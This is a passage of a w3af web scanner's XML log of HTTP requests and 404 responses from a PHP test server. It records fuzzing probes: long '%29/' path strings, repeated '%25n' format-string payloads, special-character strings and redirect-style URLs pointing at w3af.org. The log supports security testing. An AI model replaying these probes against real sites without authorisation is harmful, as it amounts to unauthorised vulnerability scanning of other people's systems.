                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="318">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="320">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="321">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="322">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="323">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="324">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="325">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="326">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="327">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="328">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="329">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="330">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="331">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="332">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="333">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="336">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="340">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ICUlWhNt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ICUlWhNt has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ICUlWhNt'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="344">
                <http-request>
